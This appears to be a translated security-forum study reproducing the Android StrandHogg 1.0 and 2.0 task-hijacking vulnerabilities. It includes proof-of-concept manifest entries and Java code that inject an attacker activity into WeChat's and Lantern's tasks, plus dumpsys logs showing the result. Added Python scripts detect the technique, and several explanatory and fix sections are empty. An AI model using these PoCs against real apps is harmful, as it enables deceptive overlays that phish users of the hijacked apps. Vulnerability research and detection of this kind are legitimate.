Android StrandHogg Vulnerability Reproduction Study
This is a featured article from the Kanxue Forum.
Kanxue Forum author ID: mb44
I. StrandHogg 1.0
StrandHogg 1.0 is an Android task-stack hijacking vulnerability disclosed in 2019; the affected range covers Android 10 and below. It lets a malicious app inject an activity on top of whichever app it has chosen as the target, so the malicious app can craft a deceptive activity and plant it inside the victim app to carry out an attack.
1. Prerequisites
<activity android:name=".inject_activity"
    android:allowTaskReparenting="true"
    android:taskAffinity="com.xx.mm"/>
2. How the vulnerability works
3. PoC design
<activity android:name=".Innocent"></activity>
<activity
android:name=".Hack"
android:allowTaskReparenting="true"
android:taskAffinity="com.tencent.mm" />
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
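The two manifest attributes used by the Hack activity above (a taskAffinity that names another package, plus allowTaskReparenting) are the ingredients of the 1.0 technique, so a defender's first check is a static scan of the manifest. The Python script below is an added example, not code from the article or from the researchers who disclosed StrandHogg. It parses an AndroidManifest.xml (here a constructed sample mirroring the PoC manifest; the package name com.test.strandhogg is assumed, taken from the dumpsys output later in the article) and flags activities whose android:taskAffinity points outside the app's own package or that set android:allowTaskReparenting="true".

```python
"""Static check for StrandHogg-style task-affinity abuse in an AndroidManifest.xml.

Added example (not from the original article). It flags <activity> elements whose
android:taskAffinity names a package other than the app's own, and activities that
set android:allowTaskReparenting="true".
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def find_affinity_abuse(manifest_xml: str):
    """Return a list of (activity_name, reasons) for suspicious activities."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    app = root.find("application")
    if app is None:
        return findings
    for act in app.iter("activity"):
        name = _attr(act, "name") or "?"
        reasons = []
        affinity = _attr(act, "taskAffinity")
        # An empty taskAffinity ("") is a hardening setting and is not flagged;
        # a non-empty one that does not belong to our package is.
        if affinity and affinity != package and not affinity.startswith(package + "."):
            reasons.append("taskAffinity %r belongs to another package" % affinity)
        if (_attr(act, "allowTaskReparenting") or "false").lower() == "true":
            reasons.append("allowTaskReparenting=true lets the activity move into another task")
        if reasons:
            findings.append((name, reasons))
    return findings


# Constructed sample mirroring the article's PoC manifest (package name is assumed).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.test.strandhogg">
  <application>
    <activity android:name=".Innocent"/>
    <activity android:name=".Hack"
        android:allowTaskReparenting="true"
        android:taskAffinity="com.tencent.mm"/>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    for name, reasons in find_affinity_abuse(SAMPLE_MANIFEST):
        print(name)
        for r in reasons:
            print("  -", r)
```

Run against a decoded manifest (for example the output of apktool or aapt2 dump xmltree converted to plain XML); only .Hack is reported for the sample above. The same attributes are also the mitigation lever for a victim app: setting android:taskAffinity="" on its own activities keeps them out of any task an injected activity could claim.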
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // Start two activities
        Intent hack_intent;
        Log.d("MainActivity的TaskId", getTaskId() + "");
        hack_intent = new Intent(this, Hack.class);
        // FLAG_ACTIVITY_NEW_TASK behaves like launchMode=singleTask: the activity is
        // placed in the task whose affinity matches its android:taskAffinity
        hack_intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        startActivity(hack_intent);
        Intent innocent_intent;
        innocent_intent = new Intent(this, Innocent.class);
        startActivity(innocent_intent);
        //finish();
    }
}
Display #0 (activities from top to bottom):
  Stack #171: type=standard mode=fullscreen
    Task id #191
    ···
    Running activities (most recent first):
      // The app's own task 191 does not contain the Hack activity; it is in another, new task (192)
      TaskRecord{8780ff6 #191 A=com.test.strandhogg U=0 StackId=171 sz=2}
        Run #1: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
        Run #0: ActivityRecord{f021ac5 u0 com.test.strandhogg/.MainActivity t191}
    mResumedActivity: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
  Stack #172: type=standard mode=fullscreen
    Task id #192
    ···
    * TaskRecord{c609e64 #192 A=com.tencent.mm U=0 StackId=172 sz=1}
    // This task was never run or brought to the foreground, so it has no ActivityRecord
  Stack #177: type=standard mode=fullscreen
    Task id #197
    Running activities (most recent first):
      TaskRecord{4a0127f #197 A=com.tencent.mm U=0 StackId=177 sz=1}
        Run #0: ActivityRecord{4076818 u0 com.test.strandhogg/.Hack t197}
4. The fix
II. StrandHogg 2.0 (CVE-2020-0096)
1. How the vulnerability works
2. PoC design
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Intent[] intents = new Intent[2];
        intents[0] = new Intent();
        intents[0].setClassName("org.getlantern.lantern", "org.getlantern.lantern.MainActivity");
        intents[0].addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        intents[1] = new Intent(this, Hack1.class);
        // To hijack several apps, enlarge the Intent array and repeat the intent[0]/intent[1] pair
        startActivities(intents);
    }
}
Running activities (most recent first):
  TaskRecord{85bf004 #444 A=org.getlantern.lantern U=0 StackId=420 sz=2}
    Run #1: ActivityRecord{b7ba43 u0 com.test.strandhogg2/.Hack1 t444}
    Run #0: ActivityRecord{b564328 u0 org.getlantern.lantern/.MainActivity t444}
Running activities (most recent first):
  TaskRecord{66e7766 #445 A=com.test.strandhogg2 U=0 StackId=421 sz=1}
    Run #0: ActivityRecord{637578 u0 com.test.strandhogg2/.MainActivity t445}
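Both dumpsys listings in this article, the 1.0 one (Hack in a task whose affinity is com.tencent.mm) and the 2.0 one above (Hack1 in the org.getlantern.lantern task), show the same symptom: an ActivityRecord whose package differs from the A= affinity of the TaskRecord it sits in. The Python script below is an added example, not part of the article. It reads the text of adb shell dumpsys activity activities (here a constructed sample assembled from the two listings in the article) and reports such foreign activities. It is a heuristic: an app that legitimately starts another app's activity without FLAG_ACTIVITY_NEW_TASK also ends up with a foreign activity in its own task, so hits need manual review.

```python
"""Heuristic detector for hijacked tasks in `adb shell dumpsys activity activities` output.

Added example (not from the original article). It pairs each ActivityRecord with the
TaskRecord it runs in and reports activities whose package differs from the task's
affinity, which is how both StrandHogg dumps in the article look.
"""
import re
from typing import Dict, List, Tuple

# TaskRecord{<hash> #<id> A=<affinity> U=<user> StackId=<n> sz=<n>}
TASK_RE = re.compile(r"TaskRecord\{\w+ #(\d+) A=(\S+) U=\d+ StackId=\d+ sz=\d+\}")
# ActivityRecord{<hash> u<user> <package>/<activity> t<task id>}
ACT_RE = re.compile(r"ActivityRecord\{\w+ u\d+ ([\w.]+)/(\S+) t(\d+)\}")


def find_foreign_activities(dump: str) -> List[Tuple[int, str, str]]:
    """Return (task_id, task_affinity, 'pkg/Activity') for every activity that lives
    in a task whose affinity names a different package. Duplicates (for example the
    mResumedActivity line repeating a Run entry) are reported once."""
    affinity_by_task: Dict[int, str] = {}
    findings: List[Tuple[int, str, str]] = []
    for line in dump.splitlines():
        m = TASK_RE.search(line)
        if m:
            affinity_by_task[int(m.group(1))] = m.group(2)
            continue
        m = ACT_RE.search(line)
        if m:
            pkg, activity, task_id = m.group(1), m.group(2), int(m.group(3))
            affinity = affinity_by_task.get(task_id)
            if affinity is not None and affinity != pkg:
                hit = (task_id, affinity, pkg + "/" + activity)
                if hit not in findings:
                    findings.append(hit)
    return findings


# Constructed sample assembled from the two dumpsys listings in the article.
SAMPLE_DUMP = """\
Display #0 (activities from top to bottom):
  Stack #171: type=standard mode=fullscreen
    Task id #191
    Running activities (most recent first):
      TaskRecord{8780ff6 #191 A=com.test.strandhogg U=0 StackId=171 sz=2}
        Run #1: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
        Run #0: ActivityRecord{f021ac5 u0 com.test.strandhogg/.MainActivity t191}
    mResumedActivity: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
  Stack #172: type=standard mode=fullscreen
    Task id #192
    * TaskRecord{c609e64 #192 A=com.tencent.mm U=0 StackId=172 sz=1}
  Stack #177: type=standard mode=fullscreen
    Task id #197
    Running activities (most recent first):
      TaskRecord{4a0127f #197 A=com.tencent.mm U=0 StackId=177 sz=1}
        Run #0: ActivityRecord{4076818 u0 com.test.strandhogg/.Hack t197}
  Stack #420: type=standard mode=fullscreen
    Task id #444
    Running activities (most recent first):
      TaskRecord{85bf004 #444 A=org.getlantern.lantern U=0 StackId=420 sz=2}
        Run #1: ActivityRecord{b7ba43 u0 com.test.strandhogg2/.Hack1 t444}
        Run #0: ActivityRecord{b564328 u0 org.getlantern.lantern/.MainActivity t444}
  Stack #421: type=standard mode=fullscreen
    Task id #445
    Running activities (most recent first):
      TaskRecord{66e7766 #445 A=com.test.strandhogg2 U=0 StackId=421 sz=1}
        Run #0: ActivityRecord{637578 u0 com.test.strandhogg2/.MainActivity t445}
"""

if __name__ == "__main__":
    for task_id, affinity, who in find_foreign_activities(SAMPLE_DUMP):
        print("task %d (affinity %s) contains foreign activity %s" % (task_id, affinity, who))
```

Feed it the saved dumpsys output of a device under test; for the sample it reports task 197 (affinity com.tencent.mm) holding com.test.strandhogg/.Hack and task 444 (affinity org.getlantern.lantern) holding com.test.strandhogg2/.Hack1, and nothing else. The empty task 192 produces no hit because it has no ActivityRecord.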
3. The fix
Kanxue ID: mb44
https://bbs.pediy.com/user-home-942091.htm